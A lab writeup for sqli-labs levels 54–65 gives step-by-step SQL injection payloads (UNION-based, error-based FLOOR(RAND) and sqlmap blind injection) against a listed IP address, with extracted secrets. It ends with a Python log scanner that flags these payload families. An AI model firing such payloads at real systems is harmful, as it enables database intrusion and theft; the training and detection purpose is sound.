sqlilab-Less-54-65-writeup
Less-54 GET request, union query, 10 steps to the key, single quote
When doing union-based injection, the early steps (checking that the closing character works and counting the columns) must be run against an id that actually exists in the backend database. Here id=1, 2 or 3 works for testing; other numbers show nothing. Once you move on to reading table names and the later steps, a nonexistent id can be used.
Check that the closing character works
?id=1'--+
Find the number of columns
?id=1' order by 3--+
?id=1' order by 4--+
Confirm which columns are displayed (injectable)
?id=-1' union select 1,2,3 --+
From the output, columns 2 and 3 are displayed.
Get the table name
http://106.54.35.126/Less-54/?id=-1%27%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+
Result:
Your Login name:2
Your Password:BROZHOX7ME
Get the column names
http://106.54.35.126/Less-54/?id=-1%27%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28column_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x42524f5a484f58374d45%29--+
BROZHOX7ME ---> hex 42524f5a484f58374d45, online converter: https://www.bejson.com/convert/ox2str/
Result:
Your Login name:2
Your Password:id
sessid
secret_FDK5
tryy
Get the column value
http://106.54.35.126/Less-54/?id=-1%27%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28secret_FDK5%29+FROM+BROZHOX7ME%29--+
Result:
Your Login name:2
Your Password:oNf3esAKnoNVUbViCYCbGPzv
Less-55 GET request, union query, 14 steps to the key, parenthesis
Same payloads as Less-54; the closing changes from a single quote to a parenthesis.
Check that the closing character works
?id=1)--+
http://106.54.35.126/Less-55/?id=-1) union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+
The remaining steps are the same as Less-54.
Less-56 GET request, union query, 14 steps to the key, single quote and parenthesis
Check that the closing character works
?id=1')--+
http://106.54.35.126/Less-56/?id=-1%27%29%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+
The remaining steps are the same as Less-54.
Less-57 GET request, union query, 14 steps to the key, double quote
Check that the closing character works
?id=1"--+
http://106.54.35.126/Less-57/?id=-1%22%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+
Less-58 GET request, 5 steps to the key, single quote
Union queries cannot be used on this level, because the array shown to the user has been reversed, so error-based injection is the effective approach.
http://106.54.35.126/Less-58/?id=1%27+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+
Less-59 GET request, 5 steps to the key
Same as Less-58; the parameter is an integer, so no single quote.
http://106.54.35.126/Less-59/?id=1+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+
Less-60 GET request, 5 steps to the key
Same as Less-58; the closing is a double quote and a parenthesis.
http://106.54.35.126/Less-60/?id=1%22%29+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+
Less-61 GET request, 5 steps to the key
Same as Less-58; the closing is a single quote and double parentheses.
http://106.54.35.126/Less-61/?id=1%27%29%29+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+
Less-62 GET request, 5 steps to the key
Same as Less-58, but error display is disabled, so only boolean-based and time-based blind injection are possible; the closing is a single quote and one parenthesis.
Use sqlmap for boolean-based blind injection (the second command is the time-based variant)
python sqlmap.py -u http://106.54.35.126/Less-62/?id=1 --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch
python sqlmap.py -u http://106.54.35.126/Less-62/?id=1 --dbms=MySQL --random-agent --flush-session --technique=T -v 3 --level=3 --risk=3 --dbs --batch
Less-63 GET request, 5 steps to the key
Same as Less-58, but error display is disabled, so only boolean-based and time-based blind injection are possible; the closing is a single quote.
Use sqlmap for boolean-based blind injection
python sqlmap.py -u http://106.54.35.126/Less-63/?id=1 --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch
Less-64 GET request, 5 steps to the key
Same as Less-58, but error display is disabled, so only boolean-based and time-based blind injection are possible; the closing is double parentheses.
Use sqlmap for boolean-based blind injection
python sqlmap.py -u http://106.54.35.126/Less-64/?id=1 --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch
Less-65 GET request, 5 steps to the key
Same as Less-58, but error display is disabled, so only boolean-based and time-based blind injection are possible; the closing is a single quote and a parenthesis.
Use sqlmap for boolean-based blind injection
python sqlmap.py -u http://106.54.35.126/Less-65/?id=1 --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch
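As an added example, not part of the original writeup or of sqli-labs: a small Python scanner that decodes the id parameter from web-server access-log lines the way the PHP target would and flags the request families used across Less-54 to Less-61 (closure probes, ORDER BY column counting, UNION SELECT against INFORMATION_SCHEMA, and the FLOOR(RAND(0)*2) error-based trick). The log lines are constructed from this writeup's own payloads; the signature names and the log format are my own assumptions.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the injection families this writeup walks through: closure probes
# (1'--+, 1)--+, 1')--+, 1"--+), ORDER BY column counting, UNION SELECT against
# INFORMATION_SCHEMA, and the FLOOR(RAND(0)*2) duplicate-key error trick.
SIGNATURES = {
    "closure_probe": re.compile(r"""^-?\d+\s*['")]*\s*(?:--|#)"""),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I),
    "error_based_floor_rand": re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)", re.I),
}
REQUEST_RX = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def extract_params(path):
    """Decode the query string the way PHP's $_GET sees it: %XX decoded, '+' as space."""
    params = {}
    for pair in path.partition("?")[2].split("&"):
        name, _, value = pair.partition("=")  # split on the first '=' only
        if name:
            params[unquote_plus(name)] = unquote_plus(value)
    return params

def classify(value):
    """Return the sorted signature names that match one decoded parameter value."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(value))

def scan_log(text):
    """Return (line number, parameter name, matched signatures) for each suspicious request."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RX.search(line)
        if not m:
            continue
        for name, value in extract_params(m.group(1)).items():
            hits = classify(value)
            if hits:
                findings.append((lineno, name, hits))
    return findings

# Constructed access-log excerpt: a benign request, then the Less-54 probes and the
# Less-58 error-based payload from this writeup, encoded as a server would log them.
SAMPLE_LOG = r'''10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /Less-54/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-54/?id=1'--+ HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-54/?id=1'%20order%20by%203--+ HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /Less-54/?id=-1%27%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+ HTTP/1.1" 200 600
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /Less-58/?id=1%27+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+ HTTP/1.1" 200 300
'''
```

scan_log(SAMPLE_LOG) leaves line 1 clean and flags lines 2 to 5 with, in order, closure_probe, order_by_probe, information_schema plus union_select, and error_based_floor_rand plus information_schema. The same decoding step matters in practice: matching on the raw encoded URL would miss the %27 and + variants that the writeup mixes freely.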